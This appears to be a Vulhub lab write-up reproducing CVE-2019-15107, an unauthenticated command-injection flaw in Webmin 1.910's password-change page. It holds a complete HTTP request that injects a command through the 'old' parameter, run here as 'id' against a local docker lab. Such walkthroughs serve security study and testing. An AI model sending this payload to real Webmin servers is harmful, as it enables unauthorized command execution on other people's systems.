当前位置:网站首页>Vulhub vulnerability recurrence 73_ Webmin
Vulhub vulnerability recurrence 73_ Webmin
2022-07-06 05:19:00 【Revenge_ scan】
CVE-2019-15107_Webmin Remote command execution vulnerability
Vulnerability Details
Webmin Is a management class Unix System management configuration tool , have Web page . In its find password page , There is a command injection vulnerability that does not require permission , Through this vulnerability, attackers can execute arbitrary system commands .
Reference link :
-https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
- https://www.exploit-db.com/exploits/47230
- https://blog.firosolutions.com/exploits/webmin/
Environment building
shooting range :192.168.4.10_Ubuntu
Execute the following command , start-up webmin 1.910:
#docker-compose up -d
After execution , visit `https://your-ip:10000`, After ignoring the certificate, you can see webmin Login page for .

Loophole recurrence
The data package in the reference link is wrong , After reading the code , Only when sent user The value of the parameter is not known Linux In the case of users ( And the reference link is `user=root`), Will enter the modification `/etc/shadow` The place of , Trigger command injection vulnerability .
Send the following packets , You can execute the command `id`:
```
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
```

边栏推荐
- 指針經典筆試題
- idea一键导包
- SQLite queries the maximum value and returns the whole row of data
- [leetcode] 18. Sum of four numbers
- Cuda11.1 online installation
- Unity Vector3. Use and calculation principle of reflect
- Please wait while Jenkins is getting ready to work
- Codeforces Round #804 (Div. 2) Editorial(A-B)
- pix2pix:使用条件对抗网络的图像到图像转换
- Codeforces Round #804 (Div. 2)
猜你喜欢
![[untitled]](/img/7e/d0724193f2f2c8681a68bda9e08289.jpg)
[untitled]

指針經典筆試題

剑指 Offer II 039. 直方图最大矩形面积

Codeforces Round #804 (Div. 2) Editorial(A-B)

C Advanced - data storage (Part 1)

Ad20 is set with through-hole direct connection copper sheet, and the bonding pad is cross connected
![[effective Objective-C] - memory management](/img/1e/611aa998486bbac76ac103c3091794.jpg)
[effective Objective-C] - memory management

注释、接续、转义等符号
![[mask requirements of OSPF and Isis in multi access network]](/img/7d/1ba80bb906caa9be4bef165ac26d2c.png)
[mask requirements of OSPF and Isis in multi access network]

Configuration file converted from Excel to Lua
随机推荐
04. Project blog log
[mask requirements of OSPF and Isis in multi access network]
F12 solve the problem that web pages cannot be copied
Fiddler installed the certificate, or prompted that the certificate is invalid
03. 开发博客项目之登录
Nacos - TC Construction of High available seata (02)
集合详解之 Map + 面试题
Fuzzy -- basic application method of AFL
Using stopwatch to count code time
Class inheritance in yyds dry inventory C
2021 robocom world robot developer competition - undergraduate group (semi-finals)
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Vulhub vulnerability recurrence 67_ Supervisor
[classic example] binary tree recursive structure classic topic collection @ binary tree
js Array 列表 实战使用总结
Driver development - hellowdm driver
February 12 relativelayout
UCF (2022 summer team competition I)
图数据库ONgDB Release v-1.0.3